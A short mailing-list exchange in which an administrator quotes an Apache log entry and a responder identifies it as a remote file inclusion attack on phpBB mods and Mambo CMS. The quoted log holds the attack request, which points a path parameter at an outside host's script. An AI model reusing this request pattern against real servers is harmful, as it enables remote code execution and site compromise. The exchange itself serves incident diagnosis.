James D. Parra escribió: > Hello, > > I found these errors in our web logs and it appears that either there is a > PHP attack on the apache site or perhaps a kit on the server? > > Errors below (profanity not mine); > > > 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET > /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li > sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Remote code execution attack to some PHPbb mods, the other ones attempted to exploit holes in applications liek mambo CMS that has code affected by $GLOBAL overwrite PHP vulnerability http://www.hardened-php.net/advisory_202005.79.html
signature.asc
Description: OpenPGP digital signature
